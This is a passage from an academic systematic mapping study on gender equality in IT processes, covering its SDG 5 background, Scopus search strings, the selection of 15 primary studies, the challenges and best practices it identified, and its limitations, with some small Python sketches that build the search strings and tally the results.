23. Quitter, D.: Additive Fertigung: Geeignete Bauteile für die additive Fertigung identifizieren
24. Quitter, D.: Metall-3d-Druck: Spiralförmiger Kühlkanal gibt e-Motorengehäuse zusätzliche Funktion (2019). https://www.konstruktionspraxis.vogel.de/spiralfoermiger-kuehlkanal-gibt-e-motorengehaeuse-zusaetzliche-funktion-a806744/, 1 July 2022
25. Ruttkamp, E.: Philosophy of science: interfaces between logic and knowledge representation. South Afr. J. Philos. 25(4), 275–289 (2006)
26. Tonino-Heiden, B., Heiden, B., Alieksieiev, V.: Artificial life: investigations about a universal osmotic paradigm (UOP). In: Arai, K. (ed.) Intelligent Computing. LNNS, vol. 285, pp. 595–605. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-80129-8_42
27. Trentesaux, D.: Distributed control of production systems. Eng. Appl. Artif. Intell. 22(7), 971–978 (2009). https://doi.org/10.1016/j.engappai.2009.05.001
28. von Bertalanffy, L.: General System Theory. George Braziller, revised edition (2009)
29. von Foerster, H.: Cybernetics of epistemology. In: Understanding Understanding, pp. 229–246. Springer, New York (2003). https://doi.org/10.1007/0-387-21722-3_9
30. Watts, D., Strogatz, S.: Collective dynamics of ‘small-world’ networks. Nature 393, 440–442 (1998)
Gender Equality in Information Technology Processes: A Systematic Mapping Study
J. David Patón-Romero1,2(✉), Sunniva Block1, Claudia Ayala3, and Letizia Jaccheri1
1 Norwegian University of Science and Technology (NTNU), Sem Sælands Vei 7, 7034 Trondheim, Norway
[email protected], [email protected]
2 SimulaMet, Pilestredet 52, 0167 Oslo, Norway
3 Universitat Politècnica de Catalunya (UPC), Jordi Girona 29, 08034 Barcelona, Spain
[email protected]
Abstract. Information Technology (IT) plays a key role in the world we live in. As such, its relation to the 17 Sustainable Development Goals (SDGs) stated by the United Nations to improve lives and health of the people and the planet is inexorable. In particular, the SDG 5 aims to enforce gender equality and states 9 Targets that drive the actions to achieve such goals. The lack of women within IT has been a concern for several years. In this context, the objective of this study is to get an overview of the state of the art on gender equality in IT processes. To do so, we conducted a Systematic Mapping Study to investigate the addressed targets, challenges, and potential best practices that have been put forward so far. The results we have obtained demonstrate the novelty of this field, as well as a set of opportunities and challenges that currently exist in this regard, such as the lack of best practices to address gender equality in IT processes and the need to develop proposals that solve this problem. All of this can be used as a starting point to identify open issues that help to promote research on this field and promote and enhance best practices towards a more socially sustainable basis for gender equality in and by IT.
Keywords: Gender equality · Information Technology · Processes · Sustainability · Systematic Mapping Study
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023
K. Arai (Ed.): FICC 2023, LNNS 652, pp. 310–327, 2023. https://doi.org/10.1007/978-3-031-28073-3_22
1 Introduction
The United Nations (UN) proposed 17 Sustainable Development Goals (SDGs) for sustainable development, with the aim of making the world work together for peace and progress [1]. The Goals call for environmental, social, and economic sustainability [2] to better the world; these perspectives can also be seen in relation to Information Technology (IT). IT has revolutionized the world as we know it in the past decades [3] within areas such as education, social interactions, and defence, among others. However, this revolution has been accompanied by negative aspects for the three perspectives of sustainability (environment, society, and economy) [2], which must be considered to achieve true sustainable development. An example of this is the marginal representation of women in IT research, practice, and education [4]. Numbers from 2019 show that just 16% of engineering roles and 27% of roles within computing are held by women [5]. While gender gaps have evened out in many fields and parts of society in recent decades, IT seems to lag behind [6]. There are several questions that need to be addressed, such as why more women do not enter IT, why women often leave IT, and what they specifically bring to IT. Studies show that women leave IT at a higher rate than men and that, of the already few women in tech, 50% will resign from their tech role before they turn 35 [7].
In the same way, in past years IT development has created different kinds of tools that help improve people’s lives and make it easier to communicate, among other relevant functions and characteristics. So, how does the lack of female input in the development of IT solutions and, generally, in IT processes affect the resulting application? This is a difficult question to answer and one that has not yet been adequately addressed. Albusays et al. [4] stated the following: “Although it is well accepted that software development is exclusionary, there is a lack of agreement about the underlying causes, the critical barriers faced by potential future developers, and the interventions and practices that may help”.
For these reasons, the objective of this study is to understand the state of the art and how it corresponds to the Goal of gender equality (SDG 5 [1]) in IT processes, a topic that, until now, had not been explored or analyzed in previous works. By going through the current research and identifying the challenges and current best practices (through a Systematic Mapping Study), the aim is to find out how IT processes can be improved and adapted to enhance gender equality.
The rest of this study is organized as follows: Sect. 2 includes the background about gender equality and IT; Sect. 3 presents the methodology followed to conduct the analysis of the state of the art; Sect. 4 shows the results obtained; Sect. 5 discusses the main findings, as well as the limitations and implications; and Sect. 6 contains the conclusions reached. In the same way, Appendix A includes the list of references of the selected primary studies; and Appendix B shows a mapping of the answers to the research questions from each of these primary studies.
2 Background 2.1 Gender Equality The SDG 5 that the UN put forward in 2015 [1] targets gender equality. The UN recognize that progress between the SDGs is integrated, and that technology has an important role to play in achieving them. In the past decades progress in gender equality has been made, and there are today more women in leadership and political positions [8]. However, numbers from the UN show that there is still a long way to go; in agriculture women own only 13% of the land, and representation in politics is still low at 23.7%, even though it has increased1 . In developing countries genital mutilation and child marriage are some of the biggest threats affecting girls and women [9, 10]. The UN emphasizes 1 https://www.un.org/sustainabledevelopment/gender-equality/.
J. D. Patón-Romero et al.
that: “Ending all discrimination against women and girls is not only a basic human right, it is crucial for sustainable future; it is proven that empowering women and girls helps economic growth and development” (see https://www.undp.org/sustainable-development-goals#gender-equality). Gender equality is a complex goal with many dependencies that need to be fulfilled. Its main aim is to end all discrimination against all women. This goal touches many different issues and types of discrimination and has a set of 9 Targets [1]. The Targets articulate in more detail the different challenges, from female genital mutilation to equal opportunities in political leadership, among others, as can be seen in Table 1 (extracted from [1]). It is important to point out that gender equality should include all genders, and that this no longer means only men and women. However, this study revolves around the gender equality challenges that women face, as this is what the SDGs point out and what the current literature analysis presents.
Table 1. SDG 5 targets [1]
Target | Description
Target 5.1 | End all forms of discrimination against all women and girls everywhere
Target 5.2 | Eliminate all forms of violence against all women and girls in the public and private spheres, including trafficking and sexual and other types of exploitation
Target 5.3 | Eliminate all harmful practices, such as child, early and forced marriage and female genital mutilation
Target 5.4 | Recognize and value unpaid care and domestic work through the provision of public services, infrastructure and social protection policies and the promotion of shared responsibility within the household and the family as nationally appropriate
Target 5.5 | Ensure women’s full and effective participation and equal opportunities for leadership at all levels of decision-making in political, economic and public life
Target 5.6 | Ensure universal access to sexual and reproductive health and reproductive rights as agreed in accordance with the Programme of Action of the International Conference on Population and Development and the Beijing Platform for Action and the outcome documents of their review conferences
Target 5.a | Undertake reforms to give women equal rights to economic resources, as well as access to ownership and control over land and other forms of property, financial services, inheritance and natural resources, in accordance with national laws
Target 5.b | Enhance the use of enabling technology, in particular information and communications technology, to promote the empowerment of women
Target 5.c | Adopt and strengthen sound policies and enforceable legislation for the promotion of gender equality and the empowerment of all women and girls at all levels
Gender Equality in Information Technology Processes
2.2 Gender Equality in IT
Promoting more women into IT positions at all levels follows from Target 5.5 of SDG 5. This can seem superficial in comparison to genital mutilation, but having more women in these positions can help by putting more focus on the dangers girls face. As Diekman et al. state: “Lower numbers of women in STEM result in a narrower range of inquiry and progress in those fields; fields that have experienced increases in diversity also witness an increase in the range of topics pursued…” [11]. The lack of women within IT has put them in high demand among employers, and it is worth understanding why women are sought after in the IT market [12]. There are examples of companies with more women developing better management styles, being more creative, having more innovative processes, and focusing more on better user experiences [13]. Many resources are devoted to increasing the number of women in IT, and some of the main initiatives consist of university and mentoring programs [14]. These aim to create women’s networks and help women complete their degrees, but it is also necessary to look further into why women leave IT and how this can be addressed. The lack of diversity within software development is well known, but the barriers that future developers will face, as well as the practices that can help, are not thoroughly discussed and agreed upon [4]. One barrier that we are already seeing is that the lack of female input during the development of IT can lead to non-inclusive solutions [4]. A part of gender equality that many can perceive as conflicting is the drive for equality while still focusing on differences, such as the missing female perspective in IT. It is important to note that, even if gender equality is achieved, there will always be different perspectives that can only be obtained through the inclusion of all.
It is for this reason that it becomes essential to include women (as well as other social groups discriminated against on the basis of race, culture, or other characteristics) and to achieve a balance throughout all processes that involve IT. Regarding processes, ISACA (Information Systems Audit and Control Association) defines a process as a series of practices that are affected by procedures and policies, taking inputs from several sources and using these to generate outputs [15]. It further explains that processes have a defined purpose, roles, and responsibilities, as well as a performance measure. In this study we understand IT processes as processes, frameworks, and/or best practices leading to the development of IT solutions.
3 Research Method
The study is conducted as a Systematic Mapping Study (SMS) and follows the guidelines established by Kitchenham [16], also adopting the lessons learned for data extraction and analysis identified by Brereton et al. [17].
3.1 Research Questions
Table 2 shows the research questions (RQs) established to address the objective of the SMS, as well as the motivation for each of them. As one of the aims of the study is to see connections to SDG 5, RQ2 addresses this through the Targets of the SDG
5. Further, the statistics included above showed that many women leave IT, which motivated RQ3 and RQ4, addressing the challenges present in IT and the best practices for gender equality in IT processes.
Table 2. Research questions
Research question | Motivation
RQ1. What kind of studies exist on IT processes and gender equality? | Discover what studies exist on IT processes and gender equality and how they are distributed to get an overview of the field
RQ2. What gender equality Targets are addressed by IT processes? | Based on the Targets from the SDG 5, identify which targets are covered
RQ3. What are the main challenges to achieve gender equality in IT processes? | Identify the main challenges reported by existing studies in order to understand the obstacles that women in the IT sector face
RQ4. What are the best practices established to address gender equality in IT processes? | Uncover best practices that have been reported to promote gender equality in IT processes
3.2 Search Strategy
To define the keywords for the searches, 3 main topics related to the research were identified:
• The first topic refers to the field of technology. Concepts such as IT, information technology, or information systems could be used, but it was concluded that technology itself represents the field well and covers the expected scope.
• The second topic addresses processes and best practices, where both terms were implemented in the search string.
• The third topic represents gender equality, so terms in this regard were implemented in the search string.
To address all the Targets from the SDG 5, it was decided to conduct specific searches that focused on each Target. As a result, 10 different searches were performed. Table 3 shows the search strings established for each one of these searches.
3.3 Selection Criteria
In order to select the primary studies, a set of criteria was put forward to include all relevant studies and exclude those that would not aid the task. First, the criteria for including a study were established as follows:
Table 3. Search strings
Scope | Search string
General | (Technology AND (Process* OR “Best practice*”) AND (Gender OR “Women rights” OR “Social sustainability” OR “SDG 5”))
Target 5.1 | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND Discrimination))
Target 5.2 | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (Violence OR Exploitation OR Trafficking)))
Target 5.3 | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (“Harmful practices” OR Mutilation)))
Target 5.4 | (Technology AND (Process* OR “Best practice*”) AND (“Social protection policies” OR “Care work” OR “Domestic work”))
Target 5.5 | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (“Equal opportunities” OR Participation OR Leadership)))
Target 5.6 | (Technology AND (Process* OR “Best practice*”) AND ((Sexual OR Reproductive) AND (Health OR Rights)))
Target 5.a | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND Rights AND Equal*))
Target 5.b | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND Empower*))
Target 5.c | (Technology AND (Process* OR “Best practice*”) AND ((Women OR Girls OR Gender) AND (Equal* OR Empower*) AND (Policies OR Legislation*)))
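The search strings in Table 3 share a common technology and process clause and differ only in their scope-specific clause. As a minimal sketch (not the authors' tooling), the strings could be assembled programmatically and checked for balanced parentheses before being pasted into a database's advanced search. The names `PREFIX`, `CLAUSES`, `build_search_string`, and `is_balanced` are hypothetical, and straight quotes stand in for the typographic quotes printed in the table.

```python
# Illustrative sketch only: assembles the Table 3 search strings from a
# shared prefix plus a scope-specific clause. All names are hypothetical.

# Clause shared by every search string in Table 3.
PREFIX = 'Technology AND (Process* OR "Best practice*")'

# Population clause reused by most Target-specific searches.
GENDER = "(Women OR Girls OR Gender)"

# Scope-specific clauses, transcribed from Table 3.
CLAUSES = {
    "General": '(Gender OR "Women rights" OR "Social sustainability" OR "SDG 5")',
    "Target 5.1": f"({GENDER} AND Discrimination)",
    "Target 5.2": f"({GENDER} AND (Violence OR Exploitation OR Trafficking))",
    "Target 5.3": f'({GENDER} AND ("Harmful practices" OR Mutilation))',
    "Target 5.4": '("Social protection policies" OR "Care work" OR "Domestic work")',
    "Target 5.5": f'({GENDER} AND ("Equal opportunities" OR Participation OR Leadership))',
    "Target 5.6": "((Sexual OR Reproductive) AND (Health OR Rights))",
    "Target 5.a": f"({GENDER} AND Rights AND Equal*)",
    "Target 5.b": f"({GENDER} AND Empower*)",
    "Target 5.c": f"({GENDER} AND (Equal* OR Empower*) AND (Policies OR Legislation*))",
}


def build_search_string(scope: str) -> str:
    """Combine the shared prefix with the clause for one scope."""
    return f"({PREFIX} AND {CLAUSES[scope]})"


def is_balanced(query: str) -> bool:
    """Return True if every opening parenthesis has a matching close."""
    depth = 0
    for ch in query:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:  # a close appeared before its open
                return False
    return depth == 0


SEARCH_STRINGS = {scope: build_search_string(scope) for scope in CLAUSES}

if __name__ == "__main__":
    for scope, query in SEARCH_STRINGS.items():
        status = "ok" if is_balanced(query) else "UNBALANCED"
        print(f"{scope} [{status}]: {query}")
```

Generating the strings from one prefix keeps the 10 searches consistent with each other, and the balance check catches transcription slips that a search interface might otherwise reject or silently reinterpret.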
• I1. English studies published between 2016 (the year after the publication of the SDGs [1]) and 2021 about gender equality in and by the IT sector.
• I2. Complete studies that are peer reviewed in journals or conferences.
In the same way, the exclusion criteria were defined as follows:
• E1. Studies presenting opinions, or that consist only of abstracts or presentations.
• E2. Studies that do not revolve around IT processes and gender equality.
• E3. Duplicated work; only the most recent version is considered.
3.4 Data Sources and Study Selection
The selection of data sources and studies was performed through the following steps:
• Data Source Selection. The searches were all performed in the bibliographic database Scopus, through its advanced search functions.
• Initial Search. The initial search consisted of 10 search strings that resulted in a total of 4,206 studies. The study selection was performed by first reading through the titles and abstracts of all the studies and selecting according to the inclusion and exclusion criteria, which resulted in 50 potential studies.
• Limiting the Studies. The 50 potential studies were further narrowed down by applying the selection criteria to the full text of each study. This resulted in 15 primary studies, which were analyzed in detail and from which data were extracted.
3.5 Strategy for Data Extraction and Analysis
Table 4 shows the classification scheme related to the possible answers identified during the planning for each of the RQs. In addition to the general information of each study (title, authors, venue…), this classification helps to identify and extract specific data such as the type of study, scope, practices and challenges in this regard, etc.
Table 4. RQs classification scheme
Research question | Answers
RQ1. What kind of studies exist on IT processes and gender equality? | a. State of the art; b. Proposal; c. Validation; d. Others
RQ2. What gender equality Targets are addressed by IT processes? | a. Target 5.1; b. Target 5.2; c. Target 5.3; d. Target 5.4; e. Target 5.5; f. Target 5.6; g. Target 5.a; h. Target 5.b; i. Target 5.c
RQ3. What are the main challenges to achieve gender equality in IT processes? | Keyword extraction to identify answers (due to the large scope of answers that this RQ can have)
RQ4. What are the best practices established to address gender equality in IT processes? | Keyword extraction to identify answers (due to the large scope of answers that this RQ can have)
* The answers to RQ1 have their origin in an adaptation from the example of Petersen et al. [18].
4 Results
4.1 RQ1: What Kind of Studies Exist on IT Processes and Gender Equality?
RQ1 is set to discover what studies exist in the field of IT processes and gender equality. Following the extraction plan, and as visualized in Fig. 1, we find that out of the 15 primary studies there are five state-of-the-art analyses ([S06], [S07], [S10], [S12], and [S15]), one proposal ([S05]), four validations ([S04], [S08], [S09], and [S13]), and five categorized as others ([S01], [S02], [S03], [S11], and [S14]). All results were limited to the last six years, a short publication period chosen to give a quick overview of, and a first approach to, the most recent works. It is worth mentioning that seven of the studies were published in 2020–2021, three in 2019, and the remaining five in 2016–2018, indicating a growing interest in the area.
Fig. 1. Results from data extraction of RQ1 (Percentage of the Kind of Studies)
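The text reports counts per kind of study, while Fig. 1 plots percentages that are not restated in the prose. The following sketch, under the assumption that each primary study is assigned exactly one kind, derives those shares from the study lists in Sect. 4.1 and also expresses the selection funnel of Sect. 3.4 (4,206 to 50 to 15 studies) as retention rates. The names `STUDIES_BY_KIND`, `FUNNEL`, `percentages`, and `retention` are hypothetical, as are the funnel stage labels.

```python
# Illustrative sketch only: recomputes shares from counts stated in the text.
# All names and stage labels are hypothetical; the numbers come from
# Sect. 3.4 and 4.1.

# Study identifiers per kind of study, as listed in Sect. 4.1.
STUDIES_BY_KIND = {
    "State of the art": ["S06", "S07", "S10", "S12", "S15"],
    "Proposal": ["S05"],
    "Validation": ["S04", "S08", "S09", "S13"],
    "Others": ["S01", "S02", "S03", "S11", "S14"],
}

# Selection funnel from Sect. 3.4: (stage, number of studies remaining).
FUNNEL = [
    ("Initial search", 4206),
    ("Title and abstract screening", 50),
    ("Full-text screening", 15),
]


def percentages(groups: dict[str, list[str]]) -> dict[str, float]:
    """Share of each group, in percent of all studies, to one decimal."""
    total = sum(len(studies) for studies in groups.values())
    return {kind: round(100 * len(studies) / total, 1)
            for kind, studies in groups.items()}


def retention(funnel: list[tuple[str, int]]) -> dict[str, float]:
    """Percentage of the initial hits that survive each stage."""
    initial = funnel[0][1]
    return {stage: round(100 * count / initial, 2) for stage, count in funnel}


KIND_SHARE = percentages(STUDIES_BY_KIND)
FUNNEL_RETENTION = retention(FUNNEL)

if __name__ == "__main__":
    for kind, share in KIND_SHARE.items():
        print(f"{kind}: {share}%")
    for stage, share in FUNNEL_RETENTION.items():
        print(f"{stage}: {share}% of initial hits")
```

Under these assumptions, well under 1% of the initial hits survive full-text screening, which is the quantitative basis for the later remark that few of the studies found fall within the established scope.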
4.2 RQ2: What Gender Equality Targets are Addressed by IT Processes?
All the primary studies have been assessed for which of the 9 Targets of SDG 5 [1] they contribute to. The results (represented in Fig. 2) show that all 15 studies foster Target 5.5, which is concerned with ensuring women’s participation and opportunities at all levels in public life. Further, 10 of the 15 primary studies ([S01], [S02], [S04], [S05], [S06], [S11], [S12], [S13], [S14], and [S15]) address Target 5.1, which concerns ending all forms of discrimination. A third of the studies ([S04], [S05], [S06], [S10], and [S13]) address Target 5.4, which concerns promoting equality and shared responsibility within household and domestic care. Another third ([S04], [S05], [S06], [S08], and [S10]) contribute to Target 5.c, concerning policies for promoting the empowerment of women and gender equality. Finally, Target 5.b, regarding the use of enabling technology to promote the empowerment of women, is addressed by one study ([S08]). It is equally important to highlight the Targets that were not addressed by any study, which are Targets 5.2, 5.3, 5.6, and 5.a.
Fig. 2. Results from data extraction of RQ2 (Number of Studies Addressing each of the Targets within the SDG 5)
4.3 RQ3: What are the Main Challenges to Achieve Gender Equality in IT Processes?
With the aim of discovering the current challenges to gender equality in IT processes, a keyword extraction was performed, identifying the concepts in this regard that each study deals with. Figure 3 shows an overview of all the challenges that have been identified in two or more studies. The mapping of the full data extraction results can be found in Appendix B. First, the challenge most frequently mentioned is gender bias, appearing in 8 studies ([S02], [S03], [S04], [S05], [S06], [S07], [S08], and [S14]). To better understand what this challenge refers to, the APA Dictionary of Psychology describes gender bias as “any one of a variety of stereotypical beliefs about individuals on the basis of their sex, particularly as related to the differential treatment of females and males” [19]. Therefore, this challenge refers to preconceptions, held without evidence, about the involvement, performance, responsibilities, and possibilities, among others, of women in IT processes. Second, imposter syndrome is the next most frequent challenge, occurring in seven studies ([S02], [S04], [S08], [S09], [S11], [S12], and [S13]). Embedded in the term imposter syndrome is the fear of being revealed as a fraud or seen as incompetent for one’s job. Di Tullio [S13] states that we often become what we think others expect of us, and in this case imposter syndrome can lead to increased insecurity and the belief that others also believe that one is a fraud.
And, third, with four occurrences ([S01], [S07], [S13], and [S15]), implicit bias is the result of internalized bias that one is unaware of holding, and is generally understood as people acting on stereotypes or prejudice without intention. Implicit bias is often gender bias, but because people are unaware of it, it leads to challenges beyond gender bias alone. Other challenges mentioned are stereotype threat, pay gap, motherhood penalty, gender preferences, and retention problems. Stereotype threat concerns the fear of failing and thereby confirming a negative stereotype, which can lead to a decrease in career interest [S08] [S10]. The pay gap between genders is not just a problem in itself, but also a direct indication of the value that employees of different genders have in a company [S06] [S07] [S12]. The challenges around the motherhood penalty are many; one example is the perception that parenthood builds men’s commitment but reduces women’s commitment [S04] [S11] [S12]. Some studies also present gender preferences, referring to the fact that women often choose occupations that are seen as “softer”, which is also a factor within IT, where women often choose “softer” roles [S06] [S10]. Likewise, some challenges are only mentioned once, such as code acceptance, disengagement, few women, poor management, symbolic violence, queen bee syndrome, gender-based discrimination, self-efficacy, stereotype bias, and negative environment.
Fig. 3. Results from data extraction of RQ3 (Number of Studies Dealing with the Challenges to Achieve Gender Equality in IT Processes)
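The counts reported for RQ2 and RQ3 follow directly from the study lists given in Sect. 4.2 and 4.3. As a hedged sketch of how such a mapping could be tallied, the code below transcribes only the study identifiers that appear explicitly in the text; retention problems are omitted because the text names no studies for that challenge. The names `STUDIES_BY_TARGET`, `STUDIES_BY_CHALLENGE`, `tally`, and `unaddressed` are hypothetical and are not part of the authors' extraction tooling.

```python
# Illustrative sketch only: tallies label-to-study mappings transcribed from
# Sect. 4.2 and 4.3. All names are hypothetical.

# Identifiers S01..S15 for the 15 primary studies.
ALL_STUDIES = [f"S{i:02d}" for i in range(1, 16)]

# Studies addressing each SDG 5 Target (Sect. 4.2); empty list = none.
STUDIES_BY_TARGET = {
    "5.1": ["S01", "S02", "S04", "S05", "S06",
            "S11", "S12", "S13", "S14", "S15"],
    "5.2": [],
    "5.3": [],
    "5.4": ["S04", "S05", "S06", "S10", "S13"],
    "5.5": list(ALL_STUDIES),
    "5.6": [],
    "5.a": [],
    "5.b": ["S08"],
    "5.c": ["S04", "S05", "S06", "S08", "S10"],
}

# Studies mentioning each challenge (Sect. 4.3); only challenges whose
# studies are named explicitly in the text are included.
STUDIES_BY_CHALLENGE = {
    "Gender bias": ["S02", "S03", "S04", "S05", "S06", "S07", "S08", "S14"],
    "Imposter syndrome": ["S02", "S04", "S08", "S09", "S11", "S12", "S13"],
    "Implicit bias": ["S01", "S07", "S13", "S15"],
    "Pay gap": ["S06", "S07", "S12"],
    "Motherhood penalty": ["S04", "S11", "S12"],
    "Stereotype threat": ["S08", "S10"],
    "Gender preferences": ["S06", "S10"],
}


def tally(mapping: dict[str, list[str]]) -> list[tuple[str, int]]:
    """Return (label, number of distinct studies), most frequent first."""
    counts = [(label, len(set(studies))) for label, studies in mapping.items()]
    return sorted(counts, key=lambda pair: pair[1], reverse=True)


def unaddressed(mapping: dict[str, list[str]]) -> list[str]:
    """Labels that no study is mapped to."""
    return [label for label, studies in mapping.items() if not studies]


TARGET_COUNTS = dict(tally(STUDIES_BY_TARGET))
CHALLENGE_COUNTS = dict(tally(STUDIES_BY_CHALLENGE))

if __name__ == "__main__":
    print("Targets:", tally(STUDIES_BY_TARGET))
    print("Not addressed:", unaddressed(STUDIES_BY_TARGET))
    print("Challenges:", tally(STUDIES_BY_CHALLENGE))
```

Keeping the mapping as data, rather than as hand-counted totals, makes it straightforward to recheck the figures against Appendix B or to extend the tally if further studies are added.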
4.4 RQ4: What are the Best Practices Established to Address Gender Equality in IT Processes?
For RQ4, the data extraction model was based on keyword extraction, identifying the best practices to address gender equality in IT processes. Of all the selected primary studies, five provide best practices or frameworks that tackle the challenges presented in the previous subsection, but none of them is specific to IT processes. However, their characteristics and points of view allow them to be easily adapted and applied to the IT context. The best practices found in these five primary studies are presented below. First, study [S04] presents the importance of women having their own safe place to discuss challenges and support each other through women-only workshops or other arenas (online forums, offline networks…), where the main point is that women feel free to talk openly. This can keep more women in tech and combat retention problems. Second, study [S05] presents “nudging” as a way to encourage gender equality by establishing its importance without setting hard demands. Nudge theory can be applied at different levels, where the main point is nudging behavior in a direction that removes negative biases in a predictable way without changing policies or mandates. This practice can address several challenges; for example, an organization could ask all contractors to provide a pay equity report, nudging them to diminish the pay gap, or ask for the percentage of women leaders, to establish a gender balance criterion in tenders. Third, study [S06] presents the habit-breaking approach to reduce bias, which applies to both gender bias and implicit bias. The first step towards breaking a bias is being made aware of it and of the consequences it has. The second step consists of using strategies designed to address the bias, for example, perspective-taking, individualization, or counter-stereotype exposure. Fourth, study [S08] puts forward the goal congruity model as a way of understanding how people often follow gender roles. The model suggests that women often choose not
to go into IT because it goes against the communal goals society has set for women. However, this model implies that by changing the social expectations for women, they can feel more valued in their IT role or motivated to pursue a career in this field. Finally, study [S10] promotes anti-bias and gender-blind training to create more tolerance and awareness for diversity in the workplace, helping people to work more smoothly together. Although in this case this is applied to the field of gender equality, it should be highlighted that it is a method applicable to any type of discrimination.
5 Discussion
5.1 Principal Findings
Lack of Studies on IT Processes and Gender Equality. The primary studies selected cover a diverse range of fields: psychology, neuroscience, business, sociology, and technology. Since gender equality and IT lies at the intersection of several fields, this also generates a great variation in the studies analyzed. This diversity and interdisciplinarity are undoubtedly a very positive aspect and help to obtain better results in the developments and research performed. However, given the large number of studies found (4,206 in total), we expected to obtain more relevant studies than just the 15 primary studies. This shows that, although the concepts of IT and gender equality are very common and have been analyzed before [20, 21], the direct intersection of IT processes and gender equality is a novel field that should be investigated in more detail.
Low Number of Proposals and Validations. There is only one study classified as a proposal, which presents new research ideas that have not yet been implemented. In addition, there are four studies that validate their approach using a gold standard measure and are thereby assessed as validation studies following the definition of Fox et al. [22]. These results demonstrate not only the novelty of the research area of gender equality and IT processes, but also the need to develop new and updated proposals to address gender equality in and by IT processes. Likewise, it is equally important to properly validate the proposals to verify their effectiveness and efficiency in real contexts, creating high-quality research in these fields.
Right Approach towards the Targets of the SDG 5. We can observe that some of the Targets are not addressed by any study, such as Targets 5.2 and 5.3, concerning exploitation, harmful practices, and mutilation [1]. These Targets are very important, but they have only a limited and indirect relationship with IT processes and can be considered out of scope in this regard. However, although it is correct to first address the most fundamental Targets that are directly related to IT processes, it is important to also address these secondary Targets. For example, within IT processes, a series of practices can be established aimed at the specific development of IT proposals that address problems such as exploitation, harmful practices, and mutilation. Focusing on the Targets that the studies address, we can observe several findings. First, Target 5.5, about improving women’s participation and opportunities at all levels of public life, is addressed by all the primary studies and seems to be very
coherent with the RQs’ focus on achieving gender equality in IT processes. Many of the studies emphasize that women have the skills and qualities required for IT jobs. For example, the study [S03] tested how a development team’s risk-taking is affected by having more, fewer, or no women, and found no significant differences. Another example is the study [S08], which suggests that many women assess themselves as having lower abilities than men, even in situations where they are externally assessed as performing better than men. This can be connected to the observation that women often apply for a job only if they feel fully qualified, as stated by the study [S07]. Second, Target 5.1 is to end all discrimination against women, and it is also one of the most addressed Targets. The studies contribute by creating awareness of the challenges women face and by providing statistics that highlight the inequality. For example, the study [S06] highlights the pay gap that women experience. Third, Target 5.c is concerned with enforcing policies for the promotion of gender equality. The direct connection between this Target and IT processes is easy to see, especially when it comes to implementing best practices that address gender equality. This is confirmed by the fact that the 5 primary studies that deal with this Target ([S04], [S05], [S06], [S08], and [S10]) are the only ones that identify and establish a series of best practices in this regard. Finally, Target 5.4 emphasizes the importance of valuing domestic work and promoting shared responsibility within the household. The study [S06] portrays how motherhood is seen as lessening a woman’s commitment to work, which can be seen both as a stereotype and as a real outcome in households where women are expected to take on most of the childcare and additional household duties that come with an expanded family.
The view of mothers as less committed can result in their being passed over for promotions as well as salary increases in the workplace. Thus, it is necessary to understand that this is not the case, and measures must be taken to raise awareness and put an end to these preconceived and erroneous ideas.
Importance of Tackling all Challenges Together. Some of the challenges found through the primary studies concern human relational behaviors, such as bias, and others relate to women’s self-efficacy, such as imposter syndrome and stereotype threat. However, most of the challenges apply more to organizations and society as a whole, such as the pay gap, retention problems, and challenges related to motherhood. The challenges that affect how women are treated often stem from bias. Study [S01] states that most people agree that standards for excellence should be the same for all, but that this is difficult to achieve in practice due to gender bias. Some challenges mainly affect women’s self-efficacy. An example is stereotype threat, the fear of confirming the negative stereotypes of one’s group, as identified by the study [S07]. This same study further explains that stereotype threat can affect motivation and career interest, which may be one of the reasons why some women choose to leave the IT field. Likewise, an argument made by the study [S14] is that women should allow more external attributions for their setbacks, indicating that this can make them feel like they are in the right place even in an adverse environment. Several of the challenges presented are complex and need to be addressed in organizations and society. One of the biggest and most complex challenges is the motherhood
penalty, where, after having children, women are often seen as less committed, receive fewer opportunities, and are paid less [S06]. These examples, together with the rest of the challenges found, show that, even though they are different challenges, each one is connected with the others and, therefore, it is vital to address them together. For example, it is not possible to end the pay gap without addressing the bias behind the idea that a woman’s work is not equal to a man’s; and, in the same way, the pay gap leads women to feel less valued and less capable of doing a job, materializing in other challenges such as imposter syndrome or stereotype threat.
Lack of a Common Framework of Best Practices. The lack of answers to RQ4 and, therefore, of sets of best practices on gender equality with an emphasis on IT processes generates a series of findings and opportunities. Some of the studies address general best practices to improve gender equality in IT, but in an isolated manner, and none of them discusses this in relation to IT processes. Thus, the most prominent result is that, as far as the studies found through this SMS show, there seems to have been no research on using IT processes as such to achieve gender equality (although there are best practices in this regard that can be used and put together). In further detail, the studies show no way to assess or ensure that the artifact from an IT process results in a product that fits the needs of all genders, or that the process itself has any focus on gender equality. The best practices identified could therefore serve as a foundation for the development of a framework or guidelines that help implement gender-friendly IT processes. Likewise, the studies that have an answer for RQ4 are also the only studies that correspond to Target 5.c, which is about enforcing policies for gender equality and empowerment [1].
This suggests that research or development aimed at promoting gender equality in IT processes has the potential to further promote Target 5.c. However, we must not forget the other Targets of SDG 5; these results also demonstrate the opportunity for innovation and the need to develop new research to address these important Targets in and by IT processes.
5.2 Limitations
During the planning and execution of an SMS there are always limitations that can affect the results and findings. To mitigate them, it was decided to conduct 10 searches (1 at a general level and 9 corresponding to the Targets of SDG 5 [1]). This helped us find studies with very specific terminology related to each of the Targets. However, it was also decided to limit the search to a short publication period (the last 6 years). Although the purpose is to provide a first approach to the most recent works, and the area of gender equality is relatively young with the most relevant studies published in recent years, this period could be longer. Finally, certain studies may have been overlooked for different reasons, or certain evidence or advances on the studies found may not have been published at the time this SMS was executed. Likewise, the analysis of the results and findings performed in this SMS comes from the perspectives and experiences of the authors, and might not be interpreted in the same way by other stakeholders in this area. That is why, with
the aim of mitigating these risks, an attempt has been made to reduce bias by having the authors analyze the data and results independently and then reach a consensus.
5.3 Implications
